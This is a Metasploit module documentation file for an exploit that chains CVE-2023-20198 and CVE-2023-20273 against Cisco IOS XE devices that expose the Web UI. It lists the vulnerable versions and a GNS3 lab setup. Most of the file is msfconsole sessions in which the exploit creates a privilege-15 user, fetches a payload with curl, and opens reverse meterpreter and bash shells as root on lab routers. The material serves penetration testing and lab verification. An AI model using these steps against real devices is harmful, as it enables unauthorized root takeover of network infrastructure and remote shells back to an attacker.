metasploit-gs/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md

## Vulnerable Application
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.

The vulnerable IOS XE versions are:
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
17.11.99SW

NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.

## Testing
This module was tested against IOS XE version 16.12.3 and version 17.3.2 running on a CSR1000v appliance. 
To test this module you will need to either:

* Acquire a hardware device running one of the vulnerable firmware versions listed above.

Or

* Setup a virtualized environment.
  * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
    can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the 
    [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
    [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
  * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
  * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
  * Create a new CSR1000v instance as a QEMU device.
  * The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
    to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
    be accessible to a remote attacker.
  * When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
    the device:
    ```
    Router>enable
    Router#config
    Router(config)#ip http server
    router(config)#ip http secure-server
    router(config)#ip http authentication local
    router(config)#username admin privilege 15 secret qwerty
    router(config)#exit
    Router#copy running-config startup-config
    ```
  * You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty

## Verification Steps
1. Start msfconsole
2. `use exploit/linux/misc/cisco_ios_xe_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set target 0`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
6. `check`
7. `exploit`

## Options

### CISCO_VRF_NAME
We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
'global' should work, but exposing this as an option will allow for usage in more complex network setups.
A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
inspect a devices configuration to see an appropriate VRF to use.

### CISCO_CMD_TIMEOUT
We may need to try and execute a command a second time if it fails the first time. This option is the maximum
number of seconds to keep trying.

## Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based).
This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.

### Linux Command (IOS XE 17.3.2)

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.113   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           eth0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      vsLOEPPqU        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.113:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'vTakCDWG' with password 'RJQHKnKK'
[*] Removing user 'vTakCDWG'
[*] Sending stage (3045380 bytes) to 192.168.86.113
[*] Meterpreter session 5 opened (192.168.86.122:4444 -> 192.168.86.113:56702) at 2025-03-03 20:31:39 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : testc100v
OS           :  (Linux 4.19.106)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'VltpvRrx' with password 'KDJGXORf'
[*] Removing user 'VltpvRrx'
[*] Sending stage (38 bytes) to 192.168.86.113
[*] Command shell session 6 opened (192.168.86.122:4444 -> 192.168.86.113:56736) at 2025-03-03 20:32:52 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 6 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 
```

### Linux Command (IOS XE 16.12.3)

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options 

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           eth0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      UoDekiVI         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check 
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'XpJaBQIt' with password 'qEBrzlDh'
[*] Removing user 'XpJaBQIt'
[*] Sending stage (3045380 bytes) to 192.168.86.114
[*] Meterpreter session 7 opened (192.168.86.122:4444 -> 192.168.86.114:61922) at 2025-03-03 20:34:05 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : test2_c1000v
OS           :  (Linux 4.19.64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vmoCbNcA' with password 'UgDnLaCG'
[*] Removing user 'vmoCbNcA'
[*] Sending stage (38 bytes) to 192.168.86.114
[*] Command shell session 8 opened (192.168.86.122:4444 -> 192.168.86.114:61940) at 2025-03-03 20:34:58 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 8 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 
```

### Unix Target (IOS XE 17.3.2)

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'edGjwUsF' with password 'hhOLNNrX'
[*] Removing user 'edGjwUsF'
[*] Sending stage (24772 bytes) to 192.168.86.113
[*] Meterpreter session 9 opened (192.168.86.122:4444 -> 192.168.86.113:56770) at 2025-03-03 20:36:00 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : testc100v
OS           : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
Architecture : x64
Meterpreter  : python/linux
meterpreter > 
```

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'mXsKBwvG' with password 'gCUirrkj'
[*] Removing user 'mXsKBwvG'
[*] Command shell session 10 opened (192.168.86.122:4444 -> 192.168.86.113:56802) at 2025-03-03 20:36:39 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 10 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 
```

### Unix Target (IOS XE 16.12.3)

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options 

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check 
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vhQbLuix' with password 'JAjuUVov'
[*] Removing user 'vhQbLuix'
[*] Sending stage (24772 bytes) to 192.168.86.114
[*] Meterpreter session 11 opened (192.168.86.122:4444 -> 192.168.86.114:61966) at 2025-03-03 20:37:36 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : test2_c1000v
OS           : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```

```
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'JJgILIEn' with password 'EkMpGWih'
[*] Removing user 'JJgILIEn'
[*] Command shell session 12 opened (192.168.86.122:4444 -> 192.168.86.114:61982) at 2025-03-03 20:38:16 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 12 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 
```